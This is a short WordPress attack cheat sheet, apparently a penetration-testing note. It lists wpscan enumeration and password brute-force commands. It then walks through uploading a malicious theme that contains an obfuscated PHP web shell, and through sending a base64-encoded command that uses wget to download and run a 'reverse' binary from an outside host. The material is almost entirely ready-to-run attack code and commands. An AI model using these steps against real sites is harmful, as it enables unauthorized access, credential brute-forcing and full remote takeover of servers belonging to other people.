#########
Wordpress
#########

.. code-block:: bash

  wpscan --url http://172.17.0.2/ --detection-mode mixed --max-threads 50 --plugins-detection mixed
  docker run --net=host --rm -it wpscanteam/wpscan --url http://target.htb/v1/ --detection-mode mixed --max-threads 50 --plugins-detection mixed

|

| Enumerate Users

.. code-block:: bash

  wpscan --url http://172.17.0.2/ --enumerate u

|

| Brute force wpscan but highly chance to get ban in less than 3 minutes

.. code-block:: bash

  wpscan --url http://172.17.0.2/ -P /path/to/wordlisttxt -U <user to bruteforce> --max-threads 50


|


***
LPE
***

| Modify theme 

.. code-block:: bash

  http://1.2.3.4/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty

|

| Or upload your own theme

.. code-block:: bash

  cd /tmp/

  cat <<'EOF'>/tmp/style.css
  /*
  Theme Name: hacker
  Theme URI: https://hacker.com
  Author: hacker
  Author URI: https://hacker.com
  Description: hacker
  Version: 1.0
  */
  EOF

  cat <<'EOF'>/tmp/index.php
  <!DOCTYPE html>
  <html>
  <head></head>
  <body>
  DELIMITER1337
  <?php
  $a=popen(base64_decode($_REQUEST["aoOoy"]),'r');while($b=fgets($a,2048)){echo $b;ob_flush();flush();}pclose($a);
  ?>
  DELIMITER1337
  </body>
  </html>
  EOF

  7z a wpshelltheme3.zip index.php style.css

  # Upload wpshelltheme3.zip (http://1.2.3.4/wp-admin/theme-install.php?browse=popular)

  # Use your payload
  cat <<'EOF'|base64 -w0>/tmp/payload
  wget 4.3.2.1/reverse -O /tmp/reverse ; chmod 755 /tmp/reverse ; /tmp/reverse
  EOF
  curl --path-as-is "http://offsecwp/wp-content/themes/wpshelltheme3/index.php?aoOoy=$(cat /tmp/payload)"

